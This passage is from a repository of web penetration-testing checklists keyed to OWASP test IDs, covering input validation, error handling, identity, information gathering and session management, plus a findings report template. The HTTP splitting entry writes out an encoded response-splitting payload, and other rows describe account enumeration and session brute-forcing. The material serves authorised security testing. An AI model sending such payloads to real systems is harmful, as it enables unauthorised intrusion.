Overflow||{{manual}}|Not Started|| 29 | ||Stack Overflow||{{manual}}|Not Started|| 30 | ||Format String||{{manual}}|Not Started|| 31 | |OTG-INPVAL-015|Incubated Vulnerabilities|File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)|{{proxy}}|Not Started|| 32 | |OTG-INPVAL-016|HTTP Splitting/Smuggling|`param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0aSorry,%20System%20Down`|{{proxy}}|Not Started|| 33 | -------------------------------------------------------------------------------- /checklist/error_handling.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | |Error Handling Testing|Test Name|Description|Tools|Status|Comment| 5 | |----------------------|---------|-----------|-----|------|-------| 6 | |OTG-ERR-001|Error Codes|Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)|{{proxy}}|Not Started|| 7 | |OTG-ERR-002|Stack Traces| Invalid Input / Empty inputs, Input that contains non alphanumeric characters or query syntax, Access to internal pages without authentication, Bypassing application flow|{{proxy}}|Not Started|| 8 | -------------------------------------------------------------------------------- /checklist/identity_management.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | |Identity Management Testing|Test Name|Description|Tools|Status|Comment| 5 | |---------------------------|---------|-----------|-----|------|-------| 6 | |OTG-IDENT-001|Role Definitions|Validate the system roles defined within the application by creating permission matrix.|{{proxy}}|Not Started|| 7 | |OTG-IDENT-002|User Registration Process|Verify that the identity requirements for user registration are aligned with business and security requirements:|{{proxy}}|Not Started|| 8 | |OTG-IDENT-003|Account Provisioning Process|Determine which roles are able to provision users and what sort of accounts they can provision.|{{proxy}}|Not Started|| 9 | |OTG-IDENT-004|Account Enumeration, Guessable User Account|Generic login error statement check, return codes/parameter values, enumerate all possible valid userids (Login system, Forgot password)|{{browser}}, {{proxy}}|Not Started|| 10 | |OTG-IDENT-005|Weak or Unenforced Username Policy|User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed.|{{browser}}, {{proxy}}|Not Started|| 11 | |OTG-IDENT-006|Permissions of Guest/Training Accounts|Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access.Evaluate consistency between access policy and guest/training account access permissions.|{{proxy}}|Not Started|| 12 | |OTG-IDENT-007|Account Suspension/Resumption Process|Verify the identity requirements for user registration align with business/security requirements. Validate the registration process.|{{proxy}}|Not Started|| 13 | -------------------------------------------------------------------------------- /checklist/information_gathering.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | |Information Gathering|Test Name|Description|Tools|Status|Comment| 5 | |---------------------|---------|-----------|-----|------|-------| 6 | |OTG-INFO-001|Conduct Search Engine Discovery and Reconnaissance for Information Leakage|Use a search engine to search for Network diagrams and Configurations, Credentials, Error message content.|{{manual}}|Not Started|| 7 | |OTG-INFO-002|Fingerprint Web Server|Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using "HTTP header field ordering" and "Malformed requests test".|{{custom}}|Not Started|| 8 | |OTG-INFO-003|Review Webserver Metafiles for Information Leakage|Analyze robots.txt and identify Tags from website.|{{browser}}|Not Started|| 9 | |OTG-INFO-004|Enumerate Applications on Webserver|Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers|{{scanner}}|Not Started|| 10 | |OTG-INFO-005|Review Webpage Comments and Metadata for Information Leakage|Find sensitive information from webpage comments and Metadata on source code.|{{browser}}|Not Started|| 11 | |OTG-INFO-006|Identify application entry points|Identify from hidden fields, parameters, methods HTTP header analysis|{{browser}}|Not Started|| 12 | |OTG-INFO-007|Map execution paths through application|Map the target application and understand the principal workflows.|{{proxy}}|Not Started|| 13 | |OTG-INFO-008|Fingerprint Web Application Framework|Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.|{{manual}}|Not Started|| 14 | |OTG-INFO-009|Fingerprint Web Application|Identify the web application and version to determine known vulnerabilities and the appropriate exploits.|{{manual}}|Not Started|| 15 | |OTG-INFO-010|Map Application Architecture|Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database|{{browser}}|Not Started|| 16 | -------------------------------------------------------------------------------- /checklist/session_management.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | |Session Management Testing|Test Name|Description|Tools|Status|Comment| 5 | |--------------------------|---------|-----------|-----|------|-------| 6 | |OTG-SESS-001|Session Management Schema Bypass|SessionID analysis prediction, unencrypted cookie transport, brute-force.|{{proxy}}|Not Started|| 7 | |OTG-SESS-002|Cookies Attributes|Check HTTPOnly and Secure flag, expiration, inspect for sensitive data.|{{proxy}}|Not Started|| 8 | |OTG-SESS-003|Session Fixation|The application doesn't renew the cookie after a successfully user authentication.|{{proxy}}|Not Started|| 9 | |OTG-SESS-004|Exposed Session Variables|Encryption & Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?|{{proxy}}|Not Started|| 10 | |OTG-SESS-005|Cross-Site Request Forgery|URL analysis, Direct access to functions without any token.|{{proxy}}|Not Started|| 11 | |OTG-SESS-006|Logout Functionality|Check reuse session after logout both server-side and SSO.|{{proxy}}|Not Started|| 12 | |OTG-SESS-007|Session Timeout|Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.|{{proxy}}|Not Started|| 13 | |OTG-SESS-008|Session Puzzling|The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.|{{proxy}}|Not Started|| 14 | -------------------------------------------------------------------------------- /report_template.md: -------------------------------------------------------------------------------- 1 | --- 2 | --- 3 | 4 | # Summary of Findings 5 | 6 | |No.|Vulnerability Name|OTG|Affected Host/Path|Impact|Likelihood|Risk|Observation/Implication|Recommendation|Test Evidence| 7 | |---|------------------|---|------------------|------|----------|----|-----------------------|--------------|-------------| 8 | |{{index}}|{{vulnerability}}|{{otg}}|{{entity}}|{{impact}}|{{likelihood}}|{{risk}}|{{comment}}|{{remediation}}|{{evidence}}| 9 | -------------------------------------------------------------------------------- /variables.yml: -------------------------------------------------------------------------------- 1 | --- 2 | browser: ~ 3 | custom: ~ 4 | manual: ~ 5 | proxy: ~ 6 | --------------------------------------------------------------------------------